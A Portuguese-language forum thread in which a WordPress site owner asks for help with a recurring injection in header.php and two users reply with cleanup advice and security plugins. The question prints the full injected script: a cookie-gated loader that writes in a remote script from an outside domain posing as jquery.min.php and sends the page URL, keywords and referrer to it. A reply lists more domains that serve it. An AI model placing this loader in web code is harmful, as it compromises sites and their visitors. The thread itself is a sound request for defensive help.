Portal GSTI
Portal GSTI

PublicarCadastre-seLogin
Menu
Claudio Leminski
Claudio Leminski
pergunta

Malware em meu site wordpress (jquery.min fake)

Tenho um site em wordpress que está seguidamente sendo atacado. Esse script abaixo sempre aparece no meu cabeçalho (header.php) e meu site não abre, fica com uma tela em branco.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Eu apago o script,  ele some um tempo e depois volta. Já não sei mais o que fazer. Alguém está passando ou passou por isso? 

COMPARTILHE

Respostas

User Avatar
Marco Mascarenhas

@Claudio, passei por isso com alguns sites meus também.  Para solucionar o problema primeiro é importante identificar o problema. Algum arquivo está servindo como porta de entrada de malwares no seu site. 

É importante atualizar a versão do #Wordpress para a mais recente e verificar principalmente seus plugins e  arquivos do tema usado para ver se encontra algum arquivo malicioso.

Sugiro você também verificar se existe algum arquivos suspeito na raiz do site. Normalmente os arquivos que são do core do wordpress são esses:

  1. /wp-admin/
  2. /wp-content/
  3. /wp-includes/
  4. index.php
  5. license.txt
  6. readme.html
  7. wp-activate.php
  8. wp-blog-header.php
  9. wp-comments-post.php
  10. wp-config.php
  11. wp-config-sample.php
  12. wp-cron.php
  13. wp-links-opml.php
  14. wp-load.php
  15. wp-login.php
  16. wp-mail.php
  17. wp-settings.php
  18. wp-signup.php
  19. wp-trackback.php
  20. xmlrpc.php

Para facilitar esse trabalho de procura de malware eu usei um plugin que foi bastante eficaz. O nome do plugin é Anti-Malware Security and Brute-Force Firewall. Pra mim ele serviu muito bem. Encontrou as portas de entrada e limpou os arquivos infectados.

Um outro ponto importante é trocar as senhas de administrador do painel administrativo do wordpress. Espero que tenha ajudado

User Avatar
Telma Gomes Souza

Essa galera que fica criando essas besteiras não tem o que fazer não, né?

Fui pesquisar mais sobre esse problema e tem inúmeras pessoas no mundo sofrendo do mesmo mal...ware.  ;)

Só que as páginas que o jquery.min.php é inserido são de diversos endereços diferentes:

http://brittaschmeis.ed/js/jquery.min.php
http://www.rentalnyc.com/js/jquery.min.php
http://sairikuncle.com/js/jquery.min.php
http://doman.epart.com/js/jquery.min.php
http://yarplem.ru/js/jquery.min.php
http://shiro-mega.com/js/jquery.min.php
http://educalia.edu.mx/js/jquery.min.php
http://vkgraf.ru/js/jquery.min.php
http://im.bhca.ws/js/jquery.min.php
http://agn.eng.br/js/jquery.min.php
http://www.kobers.de/js/jquery.min.php
http://vertekoasys.com/js/jquery.min.php
http://jonuts.com/js/jquery.min.php
http://buro-tweevoud.nl/js/jquery.min.php
http://www.unvc.com.ua/js/jquery.min.php

E isso não está acontecendo somente no Wordpress não.  O #Joomla também está sofrendo esses ataques.

Eu uso muito o Wordfence e ele me alerta quando qualquer arquivo que não deveria ser modificado, foi.  Eu já li um pessoal falando bem do Sucuri Plugin, mas esse eu nunca usei.

Consegue ajudar? A comunidade agradece